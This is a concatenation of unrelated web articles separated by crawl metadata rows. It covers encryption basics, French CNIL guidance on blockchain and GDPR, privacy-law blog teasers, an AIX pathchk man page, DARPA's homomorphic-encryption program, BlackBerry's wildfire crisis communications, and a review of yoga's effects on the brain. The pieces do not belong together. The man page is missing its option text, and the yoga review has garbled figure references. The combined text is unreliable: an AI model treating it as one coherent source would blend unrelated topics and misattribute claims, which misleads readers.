Encryption is a technique employed for keeping sensitive and private information safe, such as passwords, identity information, credit card details. In this article, we will explain what encryption is in detail. As a member of the society in the 21st century, you must have accounts on some online platforms or done online shopping at least once in your life. Have you ever wondered how your sensitive information like credit card details, passwords and such are kept safe in such platforms? The answer is short and quite straightforward: encryption! In this article, we will take a closer look at what encryption is and how it can be very crucial for your organization’s cyber security operations. *
Simply put, encryption refers to the practices that aim creating ciphertexts from plaintexts. Plaintexts are the texts that can be read and understood by the third parties, on the other hand ciphertexts are scrambled texts that cannot be understood by the third parties if they somehow managed to get their hands on this piece of information. In order to decipher a text, you need to use a cipher or an encryption algorithm that will sort out the ciphertext and recreate the plaintext. To the plain eye, encrypted data may seem very random or even chaotic. In fact, it is ‘scrambled’ in a very rule governed, predictable way.
The intended receiver of the encrypted data can decipher it with the help of a key, an algorithm, a decoder or something similar. If the data and the encryption technique are on the digital realm, the intended receiver can use the corresponding decryption tool and acquire the information they need. The thing used for decryption purposes can be called as the key, cipher or algorithm. Below you can find detailed information on each.
The term cipher refers to the algorithm that is specifically used for the encryption purposes. A cipher consists of a set of successive steps at the end of which the encrypted information is decrypted. There are two main kinds of ciphers: stream ciphers and block ciphers.
Algorithms are the procedures that are followed by the encryption processes. There are numerous types of algorithms that are specifically used to decipher encrypted files and information: blowfish, triple DES and RSA are some of these types. In addition to the algorithms and ciphers, brute force can be used to decrypt an encrypted text.
There are various techniques employed for encryption. As a result, one can opt for various types of encryption. Below you can find detailed information on these different kinds.
In this kind of encryption, all the communicating parties have the same key for encryption and decryption purposes.
In this kind of encryption, two different keys are used. One is for the encryption purposes and the other is for decryption purposes. One of these keys are shared publicly while the other one is kept private. That is why asymmetrical encryption is also known as the public key encryption. This specific kind of encryption is also of pivotal importance for SSL (TLS).
|
<urn:uuid:ce2ac08d-4c21-4667-a495-a0bb126e7a99>
|
CC-MAIN-2022-40
|
https://www.logsign.com/blog/what-is-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00647.warc.gz
|
en
| 0.949276 | 607 | 3.671875 | 4 |
Recently, the French Data Protection Authority (“CNIL”) published its initial assessment of the compatibility of blockchain technology with the EU General Data Protection Regulation (GDPR) and proposed concrete solutions for organizations wishing to use blockchain technology when implementing data processing activities.
What is a Blockchain?: A blockchain is a database in which data is stored and distributed over a high number of computers and all entries into that database (called “transactions”) are visible by all the users of the blockchain. It is a technology that can be used to process personal data and is not a processing activity in itself.
Scope of the CNIL’s Assessment
The CNIL made it clear that its assessment does not apply to (1) distributed ledger technology (DLT) solutions and (2) private blockchains.
- DLT solutions are not blockchains and are too recent and rare to allow the CNIL to carry out a generic analysis.
- Private blockchains are defined by the CNIL as blockchains under the control of a party that has sole control over who can join the network and who can participate in the consensus process of the blockchain (i.e., the process for determining which blocks get added to the chain and what the current state is). These private blockchains are simply classic distributed databases. They do not raise specific GDPR compliance issues, unlike public blockchains (i.e., blockchains that anyone in the world can read or send transactions to, and expect to see included if valid, and anyone in the world can participate in the consensus process) and consortium blockchains (i.e., blockchains subject to rules that define who can participate in the consensus process or even conduct transactions).
In its assessment, the CNIL first examined the role of the actors in a blockchain network as a data controller or data processor. The CNIL then issued recommendations to minimize privacy risks to individuals (data subjects) when their personal data is processed using blockchain technology. In addition, the CNIL examined solutions to enable data subjects to exercise their data protection rights. Lastly, the CNIL discussed the security requirements that apply to blockchain.
Role of Actors in a Blockchain Network
The CNIL made a distinction between the participants who have permission to write on the chain (called “participants”) and those who validate a transaction and create blocks by applying the blockchain’s rules so that the blocks are “accepted” by the community (called “miners”). According to the CNIL, the participants, who decide to submit data for validation by miners, act as data controllers when (1) the participant is an individual and the data processing is not purely personal but is linked to a professional or commercial activity; and (2) the participant is a legal personal and enters data into the blockchain.
If a group of participants decides to implement a processing activity on a blockchain for a common purpose, the participants should identify the data controller upstream, e.g., by (1) creating an entity and appointing that entity as the data controller, or (2) appointing the participant who takes the decisions for the group as the data controller. Otherwise, they could all be considered as joint data controllers.
According to the CNIL, data processors within the meaning of the GDPR may be (1) smart contract developers who process personal data on behalf of the participant – the data controller, or (2) miners who validate the recording of the personal data in the blockchain. The qualification of miners as data processors may raise practical difficulties in the context of public blockchains, since that qualification requires miners to execute with the data controller a contract that contains all the elements provided for in Article 28 of the GDPR. The CNIL announced that it was currently conducting an in-depth reflection on this issue. In the meantime, the CNIL encouraged actors to use innovative solutions enabling them to ensure compliance with the obligations imposed on the data processor by the GDPR.
How to Minimize Risks To Data Subjects
- Assessing the appropriateness of using blockchain
As part of the Privacy by Design requirements under the GDPR, data controllers must consider in advance whether blockchain technology is appropriate to implement their data processing activities. Blockchain technology is not necessarily the most appropriate technology for all processing of personal data, and may cause difficulties for the data controller to ensure compliance with the GDPR, and in particular, its cross-border data transfer restrictions. In the CNIL’s view, if the blockchain’s properties are not necessary to achieve the purpose of the processing, data controllers should give priority to other solutions that allow full compliance with the GDPR.
If it is appropriate to use blockchain technology, data controllers should use a consortium blockchain that ensures better control of the governance of personal data, in particular with respect to data transfers outside of the EU. According to the CNIL, the existing data transfer mechanisms (such as Binding Corporate Rules or Standard Contractual Clauses) are fully applicable to consortium blockchains and may be implemented easily in that context, while it is more difficult to use these data transfer mechanisms in a public blockchain.
- Choosing the right format under which the data will be recorded
As part of the data minimization requirement under the GDPR, data controllers must ensure that the data is adequate, relevant and limited to what is necessary in relation to the purposes for which the data is processed.
In this respect, the CNIL recalled that the blockchain may contain two main categories of personal data, namely (1) the credentials of participants and miners and (2) additional data entered into a transaction (e.g., diploma, ownership title, etc.) that may relate to individuals other than the participants and miners.
The CNIL noted that it was not possible to further minimize the credentials of participants and miners since such credentials are essential to the proper functioning of the blockchain. According to the CNIL, the retention period of this data must necessarily correspond to the lifetime of the blockchain.
With respect to additional data, the CNIL recommended using solutions in which (1) data in cleartext form is stored outside of the blockchain and (2) only information proving the existence of the data is stored on the blockchain (i.e., cryptographic commitment, fingerprint of the data obtained by using a keyed hash function, etc.).
In situations in which none of these solutions can be implemented, and when this is justified by the purpose of the processing and the data protection impact assessment revealed that residual risks are acceptable, the data could be stored either with a non-keyed hash function or, in the absence of alternatives, “in the clear.”
How to Ensure that Data Subjects Can Effectively Exercise Their Data Protection Rights
According to the CNIL, the exercise of the right to information, the right of access and the right to data portability does not raise any particular difficulties in the context of blockchain technology (i.e., data controllers may provide notice of the data processing and may respond to data subjects’ requests of access to their personal data or data portability requests.)
However, the CNIL recognized that it is technically impossible for data controllers to meet data subjects’ requests for erasure of their personal data when the data is entered into the blockchain: once in the blockchain system, the data can no longer be rectified or erased.
In this respect, the CNIL pointed out that technical solutions exist to move towards compliance with the GDPR. This is the case if the data is stored on the blockchain using a cryptographic method (see above). In this case, the deletion of (1) the data stored outside of the blockchain and (2) the verification elements stored on the blockchain, would render the data almost inaccessible.
With respect to the right to rectification of personal data, the CNIL recommended that the data controller enter the updated data into a new block since a subsequent transaction may cancel the first transaction, even if the first transaction will still appear in the chain. The same solutions as those applicable to requests for erasure could be applied to inaccurate data if that data must be erased.
The CNIL considered that the security requirements under the GDPR remain fully applicable in the blockchain.
In the CNIL’s view, the challenges posed by blockchain technology call for a response at the European level. The CNIL announced that it will cooperate with other EU supervisory authorities to propose a robust and harmonized approach to blockchain technology.
Blog courtesy of Hunton Andrews Kurth, a U.S.-based law firm with a Global Privacy and Cybersecurity practice that’s known throughout the world for its deep experience, breadth of knowledge and outstanding client service. Read the company’s privacy blog here.
|
<urn:uuid:fc966d4e-5f2c-4c31-92b5-0e4daf8c527f>
|
CC-MAIN-2022-40
|
https://www.msspalert.com/cybersecurity-markets/emea/blockchain-and-gdpr-compliance-a-closer-look/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00647.warc.gz
|
en
| 0.910468 | 1,789 | 2.625 | 3 |
The past month has seen one blockbuster revelation after another about how our mobile phone and broadband providers have been leaking highly sensitive customer information, including real-time location data and customer account details. In the wake of these consumer privacy debacles, many are left wondering who’s responsible for policing these industries? How exactly did we get to this point? What prospects are there for changes to address this national privacy crisis at the legislative and regulatory levels? These are some of the questions we’ll explore in this article.
Lawmakers in the U.S. Senate today introduced a bill that would set baseline security standards for the government’s purchase and use of a broad range of Internet-connected devices, including computers, routers and security cameras. The legislation, which also seeks to remedy some widely-perceived shortcomings in existing cybercrime law, was developed in direct response to a series of massive cyber attacks in 2016 that were fueled for the most part by poorly-secured “Internet of Things” (IoT) devices.
The U.S. Senate is preparing to vote on cybersecurity legislation that proponents say is sorely needed to better help companies and the government share information about the latest Internet threats. Critics of the bill and its many proposed amendments charge that it will do little, if anything, to address the very real problem of flawed cybersecurity while creating conditions that are ripe for privacy abuses. What follows is a breakdown of the arguments on both sides, and a personal analysis that seeks to add some important context to the debate.
Lost in the ongoing media firestorm over the National Security Agency’s domestic surveillance activities is the discussion about concrete steps to bring the nation’s communications privacy laws into the 21st Century. Under current laws that were drafted before the advent of the commercial Internet, federal and local authorities can gain access to mobile phone and many email records without a court-issued warrant. In this post, I’ll explain what federal lawmakers and readers can do to help change the status quo.
Internet regulators are pushing a controversial plan to restrict public access to WHOIS Web site registration records. Proponents of the proposal say it would improve the accuracy of WHOIS data and better protect the privacy of people who register domain names. Critics argue that such a shift would be unworkable and make it more difficult to combat phishers, spammers and scammers.
|
<urn:uuid:d7389d37-e68f-4fe1-afa5-513c8e18808c>
|
CC-MAIN-2022-40
|
https://krebsonsecurity.com/tag/cdt/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00047.warc.gz
|
en
| 0.943755 | 542 | 2.53125 | 3 |
Checks path names.
The pathchk command checks that one or more path names are valid and portable. By default, the pathchk command checks each component of each path name specified by the pathname parameter based on the underlying file system. An error message is sent for each path name that meets the following criteria:
- The byte length of the full path name is longer than allowed by the system.
- The byte length of a component is longer than allowed by the system.
- Search permission is not allowed for a component.
- A character in any component is not valid in its containing directory.
It is not an error if one or more components of a path name do not exist. If a file that matches the path name specified by the pathname parameter can be created and it must not violate any of the above criteria.
extensive portability checks are run when the
|| Checks the path name based on POSIX portability standards.
An error message is sent for each path name that meets the following
|| Checks the pathname operand
and returns an error message if the pathname operand
meets the following criteria:
This command returns the following exit values:
||All pathname operands passed all of the checks.|
||An error occurred.|
- To check the validity and portability of the /home/bob/work/tempfiles path
name on your system, enter:
- To check the validity and portability of the /home/bob/temp path
name for POSIX standards, enter:
pathchk -p /home/bob/temp
|/usr/bin/pathchk||Contains the pathchk command.|
|
<urn:uuid:aa4487c3-5005-4e4a-8477-f9e42d02810b>
|
CC-MAIN-2022-40
|
https://www.ibm.com/docs/en/aix/7.1?topic=p-pathchk-command
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00047.warc.gz
|
en
| 0.668303 | 439 | 2.515625 | 3 |
DARPA Fully Homomorphic Encryption (FHE)
Protecting and preserving personally identifiable information (PII), intellectual property, intelligence insights, and other forms of sensitive information has never been more critical. A steady cadence of data breaches and attacks are reported seemingly daily. As the use of cloud computing and virtual networks becomes increasingly pervasive for storing, processing, and moving information, concerns around data vulnerability, access, and privacy are similarly on the rise.
“Today, we are seeing ongoing struggles to trust the technologies and standards in place that are designed to protect critical data,” said DARPA program manager, Tom Rondeau. “Advances in quantum computing are raising questions about the durability of some of the most advanced data protection technologies, while concerns are being raised about the collection, misuse, and handling of personal information by organizations and institutions. These challenges underscore an urgent need to explore new secure computing models that can mitigate risk whether data is at-rest, in-transit, or in use.”
Fully Homomorphic Encryption (FHE) is an approach to data security that delivers mathematical proof of encryption by using cryptographic means, providing a new level of certainty around how data is stored and manipulated. Today, traditional encryption protects data while stored or in transmission, but the information must be decrypted to perform a computation, analyze it, or employ it to train a machine learning model. Decryption endangers the data, exposing it to compromise by savvy adversaries or even accidental leaks. FHE enables computation on encrypted information, allowing users to strike a balance between using sensitive data to its full extent and removing the risk of exposure. While FHE is increasingly touted as a viable path forward, it requires a prohibitive amount of compute power and time.
“A computation that would take a millisecond to complete on a standard laptop would takes weeks to compute on a conventional server running FHE today,” noted Rondeau.
To reduce the processing time from weeks to seconds – even milliseconds – DARPA launched the Data Protection in Virtual Environments (DPRIVE) program. DPRIVE seeks to develop a hardware accelerator for FHE computations that will dramatically reduce the compute runtime overhead compared to software-based FHE approaches. The goal of the program is to design and implement a hardware accelerator for FHE computations that is capable of drastically speeding up FHE calculations, making the technology more accessible for sensitive defense applications as well as commercial use.
The safety and security of critical information – whether it is sensitive intellectual property (IP), financial information, personally identifiable information (PII), intelligence insight, or beyond – is of vital importance. Conventional data encryption methods or cryptographic solutions, such as Advanced Encryption Standards (AES), translate data into a secret “code” that can only be decoded by people with access to a decryption key. These methods protect data as it is transmitted across a network or at rest while in storage. Processing or computing on this data however requires that it is first decrypted, exposing it to numerous vulnerabilities and threats. Fully homomorphic encryption (FHE) offers a solution to this challenge. FHE enables computation on encrypted data, or ciphertext, rather than plaintext, or unencrypted data – essentially keeping data protected at all times. The benefits of FHE are significant, from enabling the use of untrusted networks to enhancing data privacy. Despite its potential, FHE requires enormous computation time to perform even simple operations, making it exceedingly impractical to implement with traditional processing hardware.
FHE relies on a particular type of cryptography called lattice cryptography, which presents complex mathematical challenges to would-be attackers that require technologies beyond the current state of the art to solve. While effective at keeping data protected, the challenge with modern lattice-based FHE is the unavoidable accumulation of noise with each calculation performed. With each homomorphic computation, a certain amount of noise – or error – is generated that corrupts the encrypted data representation. Once this noise accumulation reaches a certain point, it becomes impossible to recover the original underlying plaintext. Essentially, the data in need of protection is now lost. Computational structures called “bootstrapping” help address this untenable noise accumulation, reducing it to a level that is comparable to the original plaintext, but produces massive compute overhead to perform.
“While a number of solutions have been developed, running FHE in software on standard processing hardware remains a nearly impossible challenge,” said DARPA program manager, Dr. Tom Rondeau. “Under previous programs like the Programming Computation on Encrypted Data (PROCEED) program, DARPA helped uncover FHE algorithms and proved what could be possible with FHE running on standard CPUs. It also shed light on the compute penalty and critical limitations of the technology. Today, DARPA is continuing to invest in the exploration of FHE, focusing on a re-architecting of the hardware, software, and algorithms needed to make it a practical, widely usable solution.”
DARPA developed the Data Protection in Virtual Environments (DPRIVE) program to design and implement a hardware accelerator for FHE computations that aims to significantly reduce the current computational burden to drastically speed up FHE calculations. DPRIVE specifically seeks to reduce the computational run time overhead by many orders of magnitude compared to current software-based FHE computations on conventional CPUs, and accelerate FHE calculations to within one order of magnitude of current performance on unencrypted data.
More details on the design and high level architecture of the new generation Fully Homomorphic Encryption can be found in the following resources:
|
<urn:uuid:b4ad97c7-0439-43f1-8a4a-05e0962999ad>
|
CC-MAIN-2022-40
|
https://stefanos.cloud/blog/darpa-research-on-next-generation-fully-homomorphic-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00047.warc.gz
|
en
| 0.898971 | 1,158 | 3.046875 | 3 |
Trial By Fire: What Wildfire Response Teaches Us About Crisis Communications
Wildfire outbreaks cause panic and disruption as flames burning in dry grasslands and forests move into nearby communities, displacing people, their pets, and the natural wildlife.
In the United States, a recent fire (still burning at the time of this post and 87% contained) north of Los Angeles shut down a stretch of Interstate 5 — a major artery that runs from Mexico to Canada. The blaze led to urgent tweets about mandatory evacuations that included an elementary school too close to the flames.
Things like this are not just happening in California. Wildfires are also burning in places like Spain, Canada, and France where each government is declaring a state of emergency.
As a retired police commander who worked closely with colleagues in the fire and ambulance services, my thoughts go out to the emergency responders who are dealing with the fires head-on, and also to those communities that are affected.
My background also tells me something else here: In a quickly developing wildfire situation, a major obstacle to fighting the fire and evacuating homes and schools is a lack of clear and coordinated communication.
If you are a firefighter, you understand it often becomes inevitable to call in mutual aid from across the region, the country, or sometimes neighboring countries to deal with a large-scale incident.
As a first responder, I saw that one of the biggest obstacles slowing our reaction time at large-scale events was a lack of unified communications. This is particularly significant when emergency services are brought in under mutual aid. I have seen these challenges repeat themselves far too often.
How do those in emergency services combat the problem? The only way to accomplish this is through sharing timely, accurate, confirmed information. We cannot make our next move based on a social media post. Instead, we must confirm facts before we share and act on them. And speed is everything: These critical event scenes are complicated, fast-moving, and most essentially, they depend on rapid communication to save lives.
Where Crisis Communications Break Down
If you are in the emergency services or part of a major incident response team, you are likely well aware that response could often be faster if the right people had the right information, allowing them to act in a timely fashion. And communities need to be kept informed, particularly if they have had to leave their homes and take shelter at a rest center, with a relief organization such as the Red Cross, or with friends and family.
However, in many jurisdictions, police rely on one communication platform, while fire and paramedics have another, and ambulance crews yet another. This is often compounded by the traditional communication bottlenecks (telephone calls) required to bridge these gaps, further slowing the response.
For example, the incident commander might spend ten-minute chunks of time talking via telephone to individual commanders and specialists attending the scene, trying to gather the facts of the wildfire status, teams fighting it, evacuations and weather forecasts. In a wildfire or remote emergency, there are also challenges with different radio channels used by various agencies, particularly when calling for mutual aid.
All these things, and related complications, take time – the very thing we have least – in a large-scale wildfire event. And without a robust method of coordinating all communications, another critical thing is missing: a full audit trail.
It amazes me that in the 21st century and with all our various methods of communication, we still struggle to communicate effectively and efficiently. However, it doesn’t have to remain this way: Technology is changing the emergency response landscape.
Modern Critical Event Communication Strategy
Adopting an effective critical event management communication (CEM) strategy and platform frees first responders and agencies from siloed and bottlenecked communications. It also eliminates the risk of using consumer-grade apps, which some agencies attempt to rely on. I know this because I’ve seen professional-grade CEM systems and strategies work in practice, and I’ve experienced the powerful difference it makes.
It works like this:
- A fire response agency declares a major incident.
- With a single alert, a command center quickly and easily notifies responders and partners of the exact location, the type of incident, hazards present, access to the scene, the number and severity of casualties, and which emergency services are on the scene.
- There is no wondering if the critical event comms went out. You know because it is a two-way system: Recipients can confirm they received the message with a single click.
- You also can instantly alert members of the public in a geofenced area around the incident. Should they shelter in place? Evacuate immediately? Watch for water-dropping aircraft?
This kind of messaging platform has applications for all types of government, education, and workplace emergencies, as well. In fact, an increasing number of agencies and departments are adopting this type of CEM platform.
Moving Forward in CEM Communications
A CEM communication platform is all about getting timely and accurate information wherever and whenever you need it, then sharing it with everyone who needs to know. I’m a firm believer in providing first responders with the best tools available, to help them do their jobs — and to allow them to help the public as efficiently, effectively, and safely as possible.
Modern CEM systems are central to that goal, and I firmly believe that as a CEM provider, we at BlackBerry are materially contributing to these efforts and helping emergency services teams across the globe save lives.
Research firm Frost & Sullivan awarded the BlackBerry® AtHoc® CEM platform with the 2021 Technology Innovation Leadership Award for Safe Cities, recognizing AtHoc as a best-in-class CEM solution. And AtHoc has jointly won, with Greater Manchester Police, two UK National Technology Awards, including Mobile Innovation of the Year 2021 and Best UK Public Sector Project in 2022. AtHoc is also StateRamp authorized in the U.S.
Learn more here or follow @AtHoc.
|
<urn:uuid:493657e8-4c2c-4975-ab98-205aa0811f75>
|
CC-MAIN-2022-40
|
https://blogs.blackberry.com/en/2022/09/trial-by-fire-what-wildfire-response-teaches-us-about-crisis-communications
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00047.warc.gz
|
en
| 0.953554 | 1,239 | 3.171875 | 3 |
Biofeedback, homeopathy, acupuncture, meditation, and yoga are among the different categories of these interventions. Yoga is a form of mind-body technique that involves and contributes to both mind and body and has been used as a therapeutic intervention in various neurological and psychological disorders.
The word “Yoga” is derived from the Sanskrit origin “yuj” meaning “yoke” or “union,” and it is assumed that yoga describes the union between mind and body.
As an ancient Indian non-religious mind-body method[2,6], yoga is considered a philosophical and spiritual discipline that alleviates suffering and promotes human health.
Yoga has been practiced in Eastern cultures as a spiritual healing method for over 4000 years.
The “Yoga sutra,” a 2000-year-old guidebook, is the earliest known document of yoga that provides the framework of all branches of yoga. This book conceptualized yoga as eight limbs, which were designed to be practiced in sequence[7-9]. There are several styles of yoga, and no one is superior to another (Table 1).
Table 1 – Different types of yoga interventions
|Type of yoga||Description|
|Ashtanga||Six series of postures during breathing exercises|
|Bikram||Twenty-six poses and a sequence of two breathing exercises that take place in heated rooms with high humidity|
|Hatha||Basic postures and poses with breath regulation and meditation|
|Iyengar||Focuses on the precise structural alignment of the body|
|Jivamukti||Physically intense challenging postures with meditation|
|Kripalu||Breathing exercises at the beginning, gentle stretches, and series of poses before final relaxation|
|Kundalini||Chanting at the beginning and meditation aiming to release energy|
|Sivananda||Based on a 5-point approach, including proper breathing, diet, relaxation, exercise, and positive thinking|
|Vini||Based on in-depth training aiming to be an expert on anatomy and yoga therapy|
|Prenatal||A type of yoga helping mothers with physical training and meditation|
|Yin||Focuses on releasing tension through different joints|
A rapid increase of interest in yoga in Western countries occurred in the first decades of the 19th century, which has continued to this day. The National Health Interview Survey has reported that the number of people in the United States who practice yoga has increased dramatically among all age groups between 2002 to 2012[9,10]. Yoga practice can be a treatment for a variety of disorders as well as physical exercise.
This leads to an increase in investigations focusing on the mechanism of action and effect of yoga intervention on various mental and physical conditions[9-11]. Yoga interventions can maintain brain health through various mechanisms, such as the improvement of cerebral oxygenation, enhancement of neurotrophic and angiogenic factors (such as angiogenin), balancing the excitatory/inhibitory neurotransmitter equilibrium, modulation of immune responses, and prevention of oxidative stress.
In the present review, we first show data that point out the effect of yoga on the brain under physiological conditions. Then, we review the effect and potential mechanism of action of yoga in the treatment of neurological and psychological disorders.
EFFECT OF YOGA ON THE BRAIN
Yoga is a movement-based embodied contemplative activity that can lead to a variety of neurobiological alterations in different brain regions. Yoga exerts a regulatory effect on brain synaptic plasticity and promotes cognitive tasks, particularly working memory[17,18].
Furthermore, yoga increases inter-hemispheric coherence and symmetry and improves neurocognitive functions. Yoga may also exert pronounced anatomical changes in different brain regions, especially in the limbic system.
Effect of yoga on brain neurotransmitters
γ-aminobutyric acid (GABA) is considered the main inhibitory neurotransmitter responsible for the regulation of cortical excitability and neural plasticity[21,22]. Multiple lines of evidence suggest that yoga promotes cortical GABAergic inhibitory tone and modulates downstream brain regions[14,23]. A 12 wk yoga practice markedly enhanced the thalamic GABA values, accompanied by improved mood and reduced anxiety.
Higher thalamic GABA levels could be the result of enhanced (regional) cerebral blood flow in the prefrontal cortex of yoga practitioners, which can lead to the activation of the reticular nucleus of the thalamus and higher GABA production[26,27].
A magnetic resonance spectroscopy study has shown that yoga practitioners exhibited greater brain GABA values after a 60 min session of yoga training compared to controls. In addition to GABA, an enhancement of dopamine has been observed in the ventral striatum of subjects who practice yoga[25,29,30].
It has been suggested that yoga could cause a rise in serotonin. Several investigations performed on participants after their meditation sessions have shown an elevation of the serotonin metabolite levels in urine[25,31]. Moreover, a regular yoga practice may cause a reduction in norepinephrine values. Patients with heart failure who practiced weekly yoga displayed lower levels of norepinephrine in blood samples[30,32] (Figure ì1).
Effect of yoga on the bioelectrical activities of the brain
Yoga practices regulate electroencephalogram (EEG) signals through switching off non-relevant neural circuits for the preservation of focused attention and blockade of inappropriate signals. Studies on the effects of yoga on brain waves revealed that breathing, meditation, and posture-based yoga practice increase overall brain activity, particularly in the amygdala and the frontal cortex.
Alpha brain waves predominate during active attention and thinking as well as in some meditative conditions and correlate with basic cognitive processes. Alpha waves could reflect the physiological and pathological changes of the relevant neural network activity during conscious perception and working memory.
Investigations on brain waves in meditators concluded that meditation leads to the alterations in anterior cingulate and dorsolateral prefrontal cortices and the enhancement of alpha wave activity. Beta brain waves are dominant during wakefulness with open eyes, which could be affected by stressful conditions[37,38].
An enhancement of EEG beta wave activity has also been observed after yoga meditation practices. Beta wave activity is present throughout the motor cortex during isotonic contractions and slow movements and is related to gains in academic performance and high arithmetic calculation ability[19,40].
Theta waves assist with alertness and the ability to process information quickly. The occurrence of the higher theta wave activities is associated with lower levels of anxiety[36,41]. An increase in theta wave activity has been reported during meditation[30,36]. Longer duration of meditation is associated with higher theta and alpha wave activities[30,33,36].
Effect of yoga on brain structure and neural connectivity
Yoga intervention seems to be associated with brain structural alterations, particularly in the frontal cortex, amygdala, hippocampus, insula, and anterior cingulate cortex. An investigation on regional differences in grey matter volume associated with the practice of yoga has shown a greater grey matter volume in different areas of the dominant hemisphere, including the ventromedial orbitofrontal, ventrolateral prefrontal, and inferior temporal and parietal cortices as well as the left insula in skilled practitioners of yoga.
Furthermore, elderly yoga practitioners with several years of yoga experience have shown greater neocortical thickness in the left prefrontal complex cluster, which includes part of the lateral middle frontal gyrus, dorsal superior frontal gyrus, and anterior superior frontal gyrus compared to healthy non-practitioners.
A magnetic resonance imaging study revealed the greater volume of gray matter in the left hippocampus in skilled yoga practitioners with at least 3 years of experience compared to the sex- and age-matched control subjects. A population-based study on 3742 subjects revealed a lower right amygdala volume and a lower left hippocampus volume in those who participate in meditation and yoga practices (Figure (Figure22).
THE CLINICAL EFFECT OF YOGA
The clinical role of yoga on neurological disorders
Yoga and headaches: Several studies have suggested the beneficial effects of yoga in reducing the frequency and intensity of various forms of headaches, particularly migraine and tension headaches. Yoga has been suggested as a potential complementary therapeutic intervention for headaches. A meta-analysis on yoga for tension-type headaches and migraine has shown preliminary evidence of a short-term beneficial effect of yoga on tension-type headaches.
This study revealed a significant improvement in the frequency, duration, and intensity of pain in patients with tension-type headaches. A randomized controlled trial evaluating the beneficial effects of yoga on 114 patients with migraines has shown a significantly greater improvement in various migraine measures, including headache frequency, intensity, and use of rescue medications.
Another randomized controlled study with 19 subjects suffering from episodic migraine has shown a reduction in headache intensity, duration, depression, and anxiety as well as an improvement of self-efficacy, migraine-related disability, and quality of life from baseline to initial follow-up. A significant improvement of self-perceived pain frequency, pain intensity and duration, and psychological status as well as a reduction in medication consumption was observed in 31 patients with chronic migraine.
Furthermore, a significant decrease in headache frequency, medication intake, and stress perception has been reported in 20 patients with migraine or tension headaches. Yoga has been suggested as a potentially effective approach to reducing headaches associated with menopause.
Multiple investigations have explored the mechanisms of action of yoga on headaches. Migraine is a neurovascular disorder with significant upregulation of endothelial adhesion molecules[2,54]. It has been suggested that yoga intervention alleviates pain primarily via modulation of the pain perception system, including the anterior cingulate cortex, insula, sensory cortex, and thalamus.
A study on 42 women with migraines evaluated the effect of yoga on endothelial dysfunction in migraine patients. A 12 wk yoga training program increased delivering O2 to the body and reduced peripheral vascular resistance with a significant reduction in plasma values of vascular cell adhesion molecule, which suggests an improvement of vascular function in patients with migraine[8,51,56,57]. The amplitude of the contingent negative variation, an ultra-slow neocortical event-related potential, is significantly greater in patients with migraine compared to healthy controls, which indicates higher cortical excitability. Subjects with migraines, who practice meditation, including yoga, have shown significantly lower amplitude of contingent negative variation.
Yoga and Alzheimer’s disease: Alzheimer’s disease (AD) is characterized by neuronal loss, mostly in the neocortex and the hippocampus[2,60], and is associated with memory and cognitive impairments and neuropsychiatric dysfunctions[2,60]. It has been suggested that yoga exerts a beneficial impact on overall brain health in healthy elderly subjects, older people with mild cognitive dysfunction, and subjects with dementia.
Yoga practice promotes cognitive function, affective interaction, and physical abilities of the healthy elderly population and exerts a positive impact on total brain volume, neocortical grey matter thickness, and functional connectivity between different brain regions in subjects with mild cognitive dysfunction.
Using magnetic resonance imaging volumetric analysis, a trend toward decreased hippocampal volume atrophy has been observed after an 8 wk of yoga practice in patients with mild cognitive dysfunction. A randomized neuroimaging study with 14 subjects has shown that yoga and mindfulness meditation may decrease hippocampal atrophy and promote functional connectivity between different brain regions, including the posterior cingulate cortex, the medial prefrontal cortex, and the hippocampus in adults susceptible to dementia.
Furthermore, it has been shown that mind-body interventions, such as yoga, can restore cognition in persons with mild cognitive impairment and delay the onset of AD[65,66]. Elderly subjects suffering from mild to moderate dementia have exhibited an improvement of behavioral impairments after a 12 wk yoga training program. Metabolic enhancement for neurodegeneration, a novel therapeutic approach for AD, has merged yoga and meditation into other treatments of early AD pathology and achieved sustained cognitive improvement in 90% of patients. Yoga may enhance blood flow to areas of the brain that modulate memory functions, reduce neuronal injury, promote the symptoms of early dementia, and delay the onset of AD. Yoga can also improve the physical disability of patients with AD, such as walking, gait speed, and balance.
Although the mechanism of yoga action on AD needs to be elucidated, some possible mechanisms have been suggested. The serum values of several neurotrophic factors, such as brain-derived neurotrophic factor, increase after yoga practice in healthy individuals. This may also occur in patients with mild to moderate AD and exerts a neuroprotective effect on the neurodegenerative process of AD. The long-term practice of yoga also increases the serum value of serotonin.
The neuroprotective effects of yoga may be due to the enhancement of serotonin. Serotonin significantly destabilizes Aβ fibrils and protects neuron Aβ-induced cell injury and death. The serum levels of melatonin significantly increased after a 3 mo period of yogic practices. Melatonin reduces the Aβ level and promotes microvessel abnormalities in the neocortex and the hippocampus in experimental AD models.
Yoga and epilepsy: The goal of therapeutic approaches for epilepsy, a common neurological disorder characterized by abnormal electrical brain activity, is to eliminate or decrease the number and duration of seizures and improve the quality of life[2,78]. Several studies suggest that yogic practices can ameliorate seizures in patients with different types of epilepsy.
An investigation on the effects of yoga intervention on seizures and EEG of 32 patients suffering from idiopathic epilepsy has revealed 62% and 83% reduction of seizure frequency 3 and 6 mo after the intervention, respectively. Furthermore, this study has shown a significant shift of EEG frequency from 0-8 Hz toward 8-20 Hz.
Another randomized controlled trial conducted on 20 children aged 8-12 years with epilepsy has suggested that a 6 mo yoga intervention as an additional therapy in children with epilepsy may lead to seizure freedom and a significant improvement of epileptiform EEG signals. The evaluation of the effect of yoga on clinical outcomes of 300 patients with epilepsy has suggested that yoga is a helpful approach for patients to manage their disease.
Contrary to these reports, a clinical study reported no significant differences between the frequency of seizures between the yoga and control groups. Nonetheless, the yoga group showed significant improvements in their quality of life. An analysis of the data of two clinical trials that evaluated the effect of yoga on 50 epileptic patients suggests a possible beneficial effect of yoga in the control of seizures.
